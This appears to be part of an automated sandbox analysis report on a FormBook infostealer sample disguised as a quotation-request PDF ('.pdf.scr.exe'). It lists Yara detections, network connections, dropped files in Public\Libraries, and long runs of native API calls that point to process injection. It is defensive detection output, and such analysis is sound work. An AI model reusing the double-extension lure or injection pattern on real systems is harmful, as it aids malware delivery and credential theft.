                      Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                      Source: unknownHTTPS traffic detected: 172.217.19.238:443 -> 192.168.2.11:49705 version: TLS 1.2
                      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.11:49707 version: TLS 1.2
                      Source: Yara matchFile source: Process Memory Space: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe PID: 7920, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kmtqwssC.pif PID: 7584, type: MEMORYSTR
                      Source: Yara matchFile source: Process Memory Space: kmtqwssC.pif PID: 2260, type: MEMORYSTR

                      E-Banking Fraud

                      barindex
                      Yara detected FormBook
                      Source: Yara matchFile source: 12.2.kmtqwssC.pif.400000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.kmtqwssC.pif.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 12.2.kmtqwssC.pif.400000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 16.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.kmtqwssC.pif.400000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000010.00000002.2043784716.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.2013718675.0000000023100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000010.00000002.2072619441.000000002FE90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1878165557.000000002CC40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000C.00000002.1977379900.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.1810794029.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

                      System Summary

                      barindex
                      Initial sample is a PE file and has a suspicious name
                      Source: initial sampleStatic PE information: Filename: RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exe
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02968254 NtReadVirtualMemory,1_2_02968254
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029684C4 NtUnmapViewOfSection,1_2_029684C4
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0296DACC RtlDosPa,NtCreateFile,NtWriteFile,NtClose,1_2_0296DACC
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0296DA44 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,1_2_0296DA44
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0296DBB0 RtlDosPa,NtOpenFile,NtQueryInformationFile,NtReadFile,NtClose,1_2_0296DBB0
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02968BB0 GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,1_2_02968BB0
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029679B4 NtAllocateVirtualMemory,1_2_029679B4
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02967D00 NtWriteVirtualMemory,1_2_02967D00
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_02968BAE GetThreadContext,Wow64GetThreadContext,SetThreadContext,Wow64SetThreadContext,NtResumeThread,1_2_02968BAE
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029679B2 NtAllocateVirtualMemory,1_2_029679B2
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_0296D9F0 RtlInitUnicodeString,RtlDosPa,NtDeleteFile,1_2_0296D9F0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_0042CB13 NtClose,6_2_0042CB13
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_2CE12C70
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12DF0 NtQuerySystemInformation,LdrInitializeThunk,6_2_2CE12DF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12B60 NtClose,LdrInitializeThunk,6_2_2CE12B60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE135C0 NtCreateMutant,LdrInitializeThunk,6_2_2CE135C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12CF0 NtOpenProcess,6_2_2CE12CF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12CC0 NtQueryVirtualMemory,6_2_2CE12CC0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12CA0 NtQueryInformationToken,6_2_2CE12CA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12C60 NtCreateKey,6_2_2CE12C60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12C00 NtQueryInformationProcess,6_2_2CE12C00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12DD0 NtDelayExecution,6_2_2CE12DD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12DB0 NtEnumerateKey,6_2_2CE12DB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12D30 NtUnmapViewOfSection,6_2_2CE12D30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12D00 NtSetInformationFile,6_2_2CE12D00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12D10 NtMapViewOfSection,6_2_2CE12D10
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12EE0 NtQueueApcThread,6_2_2CE12EE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12EA0 NtAdjustPrivilegesToken,6_2_2CE12EA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12E80 NtReadVirtualMemory,6_2_2CE12E80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12E30 NtWriteVirtualMemory,6_2_2CE12E30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12FE0 NtCreateFile,6_2_2CE12FE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12FA0 NtQuerySection,6_2_2CE12FA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12FB0 NtResumeThread,6_2_2CE12FB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12F90 NtProtectVirtualMemory,6_2_2CE12F90
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12F60 NtCreateProcessEx,6_2_2CE12F60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12F30 NtCreateSection,6_2_2CE12F30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12AF0 NtWriteFile,6_2_2CE12AF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12AD0 NtReadFile,6_2_2CE12AD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12AB0 NtWaitForSingleObject,6_2_2CE12AB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12BE0 NtQueryValueKey,6_2_2CE12BE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12BF0 NtAllocateVirtualMemory,6_2_2CE12BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12BA0 NtEnumerateValueKey,6_2_2CE12BA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE12B80 NtQueryInformationFile,6_2_2CE12B80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE14650 NtSuspendThread,6_2_2CE14650
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE14340 NtSetContextThread,6_2_2CE14340
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE13D70 NtOpenThread,6_2_2CE13D70
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE13D10 NtOpenProcessToken,6_2_2CE13D10
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE139B0 NtGetContextThread,6_2_2CE139B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE13090 NtSetValueKey,6_2_2CE13090
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE13010 NtOpenDirectoryObject,6_2_2CE13010
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_02898254 NtReadVirtualMemory,8_2_02898254
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_028984C4 NtUnmapViewOfSection,8_2_028984C4
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_0289DACC NtCreateFile,NtWriteFile,NtClose,8_2_0289DACC
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_0289DA44 NtDeleteFile,8_2_0289DA44
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_02898BB0 Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,8_2_02898BB0
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_0289DBB0 NtOpenFile,NtReadFile,NtClose,8_2_0289DBB0
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_028979B4 NtAllocateVirtualMemory,8_2_028979B4
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_02897D00 NtWriteVirtualMemory,8_2_02897D00
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_02898BAE Wow64GetThreadContext,Wow64SetThreadContext,NtResumeThread,8_2_02898BAE
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_028979B2 NtAllocateVirtualMemory,8_2_028979B2
                      Source: C:\Users\Public\Libraries\Csswqtmk.PIFCode function: 8_2_0289D9F0 NtDeleteFile,8_2_0289D9F0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682B60 NtClose,LdrInitializeThunk,12_2_23682B60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682DF0 NtQuerySystemInformation,LdrInitializeThunk,12_2_23682DF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682C70 NtFreeVirtualMemory,LdrInitializeThunk,12_2_23682C70
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236835C0 NtCreateMutant,LdrInitializeThunk,12_2_236835C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23684340 NtSetContextThread,12_2_23684340
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23684650 NtSuspendThread,12_2_23684650
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682BE0 NtQueryValueKey,12_2_23682BE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682BF0 NtAllocateVirtualMemory,12_2_23682BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682BA0 NtEnumerateValueKey,12_2_23682BA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682B80 NtQueryInformationFile,12_2_23682B80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682AF0 NtWriteFile,12_2_23682AF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682AD0 NtReadFile,12_2_23682AD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682AB0 NtWaitForSingleObject,12_2_23682AB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682F60 NtCreateProcessEx,12_2_23682F60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682F30 NtCreateSection,12_2_23682F30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682FE0 NtCreateFile,12_2_23682FE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682FA0 NtQuerySection,12_2_23682FA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682FB0 NtResumeThread,12_2_23682FB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682F90 NtProtectVirtualMemory,12_2_23682F90
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682E30 NtWriteVirtualMemory,12_2_23682E30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682EE0 NtQueueApcThread,12_2_23682EE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682EA0 NtAdjustPrivilegesToken,12_2_23682EA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682E80 NtReadVirtualMemory,12_2_23682E80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682D30 NtUnmapViewOfSection,12_2_23682D30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682D00 NtSetInformationFile,12_2_23682D00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682D10 NtMapViewOfSection,12_2_23682D10
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682DD0 NtDelayExecution,12_2_23682DD0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682DB0 NtEnumerateKey,12_2_23682DB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682C60 NtCreateKey,12_2_23682C60
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682C00 NtQueryInformationProcess,12_2_23682C00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682CF0 NtOpenProcess,12_2_23682CF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682CC0 NtQueryVirtualMemory,12_2_23682CC0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23682CA0 NtQueryInformationToken,12_2_23682CA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23683010 NtOpenDirectoryObject,12_2_23683010
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23683090 NtSetValueKey,12_2_23683090
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_236839B0 NtGetContextThread,12_2_236839B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23683D70 NtOpenThread,12_2_23683D70
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 12_2_23683D10 NtOpenProcessToken,12_2_23683D10
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029685DC CreateProcessAsUserW,1_2_029685DC
                      Source: C:\Users\user\Desktop\RTD20241038II Listed Parts And Quotation Request ,pdf.scr.exeCode function: 1_2_029520C41_2_029520C4
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_004028706_2_00402870
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_004010E06_2_004010E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_0042F1436_2_0042F143
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_0040496A6_2_0040496A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_004101D36_2_004101D3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_004032306_2_00403230
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_004012C06_2_004012C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_0040E3CA6_2_0040E3CA
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_0040E3D36_2_0040E3D3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_004103F36_2_004103F3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_00416B9E6_2_00416B9E
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_00416BA36_2_00416BA3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_0040E5186_2_0040E518
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_0040E5236_2_0040E523
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_004025B06_2_004025B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD0CF26_2_2CDD0CF2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE80CB56_2_2CE80CB5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0C006_2_2CDE0C00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDADE06_2_2CDDADE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF8DBF6_2_2CDF8DBF
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEAD006_2_2CDEAD00
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7CD1F6_2_2CE7CD1F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9EEDB6_2_2CE9EEDB
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF2E906_2_2CDF2E90
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9CE936_2_2CE9CE93
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE0E596_2_2CDE0E59
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9EE266_2_2CE9EE26
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD2FC86_2_2CDD2FC8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDECFE06_2_2CDECFE0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE5EFA06_2_2CE5EFA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE54F406_2_2CE54F40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE22F286_2_2CE22F28
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE00F306_2_2CE00F30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE82F306_2_2CE82F30
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE0E8F06_2_2CE0E8F0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDC68B86_2_2CDC68B8
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE28406_2_2CDE2840
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEA8406_2_2CDEA840
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEAA9A66_2_2CEAA9A6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE29A06_2_2CDE29A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDF69626_2_2CDF6962
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDEA806_2_2CDDEA80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE96BD76_2_2CE96BD7
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9AB406_2_2CE9AB40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE8E4F66_2_2CE8E4F6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE924466_2_2CE92446
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE844206_2_2CE84420
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA05916_2_2CEA0591
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE05356_2_2CDE0535
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFC6E06_2_2CDFC6E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDDC7C06_2_2CDDC7C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE07706_2_2CDE0770
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE047506_2_2CE04750
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE720006_2_2CE72000
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE981CC6_2_2CE981CC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA01AA6_2_2CEA01AA
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE681586_2_2CE68158
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD01006_2_2CDD0100
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7A1186_2_2CE7A118
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE602C06_2_2CE602C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE802746_2_2CE80274
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEA03E66_2_2CEA03E6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEE3F06_2_2CDEE3F0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9A3526_2_2CE9A352
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9FCF26_2_2CE9FCF2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE59C326_2_2CE59C32
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFFDC06_2_2CDFFDC0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE97D736_2_2CE97D73
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE3D406_2_2CDE3D40
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE91D5A6_2_2CE91D5A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE9EB06_2_2CDE9EB0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDA3FD26_2_2CDA3FD2
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDA3FD56_2_2CDA3FD5
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE1F926_2_2CDE1F92
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9FFB16_2_2CE9FFB1
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9FF096_2_2CE9FF09
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE38E06_2_2CDE38E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE4D8006_2_2CE4D800
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE99506_2_2CDE9950
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFB9506_2_2CDFB950
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE759106_2_2CE75910
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE8DAC66_2_2CE8DAC6
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE25AA06_2_2CE25AA0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7DAAC6_2_2CE7DAAC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE81AA36_2_2CE81AA3
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE53A6C6_2_2CE53A6C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9FA496_2_2CE9FA49
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE97A466_2_2CE97A46
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE55BF06_2_2CE55BF0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE1DBF96_2_2CE1DBF9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFFB806_2_2CDFFB80
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9FB766_2_2CE9FB76
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDD14606_2_2CDD1460
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9F43F6_2_2CE9F43F
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE7D5B06_2_2CE7D5B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE975716_2_2CE97571
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE916CC6_2_2CE916CC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9F7B06_2_2CE9F7B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE970E96_2_2CE970E9
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9F0E06_2_2CE9F0E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE70C06_2_2CDE70C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE8F0CC6_2_2CE8F0CC
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDEB1B06_2_2CDEB1B0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CEAB16B6_2_2CEAB16B
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE1516C6_2_2CE1516C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCF1726_2_2CDCF172
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE812ED6_2_2CE812ED
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDFB2C06_2_2CDFB2C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDE52A06_2_2CDE52A0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE2739A6_2_2CE2739A
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CDCD34C6_2_2CDCD34C
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_2_2CE9132D6_2_2CE9132D
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_1_004015606_1_00401560
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_1_004020586_1_00402058
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_1_004010E06_1_004010E0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_1_004032306_1_00403230
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_1_004012C06_1_004012C0
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_1_004033506_1_00403350
                      Source: C:\Users\Public\Libraries\kmtqwssC.pifCode function: 6_1_004015536_1_00401553
